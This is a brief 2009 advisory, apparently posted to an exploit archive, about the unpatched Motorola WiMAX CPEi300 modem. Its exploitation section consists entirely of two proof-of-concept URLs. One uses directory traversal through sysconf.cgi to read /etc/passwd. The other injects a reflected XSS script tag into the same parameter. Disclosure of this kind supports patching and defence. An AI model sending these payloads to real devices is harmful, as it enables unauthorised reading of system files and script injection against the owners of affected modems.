motorola-traversalxss.txt
Posted on 29 January 2009
##################################################################################### # # Name : Motorola Wimax modem CPEi300 Multiple Vulnerabilities # Author : Usman Saeed # Company : Xc0re Security Reasearch Group # Homepage : http://www.xc0re.net # ##################################################################################### [Note: User needs to logged in! ] [*] Attack type : Remote [*] Patch Status : Unpatched [*] Exploitation : [+] Directory traversal http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs [+] XSS http://Hostname/cgi-bin/sysconf.cgi?page="><script>alert(1);</script>"&action=request&sid=AeoFSFoI4lDs
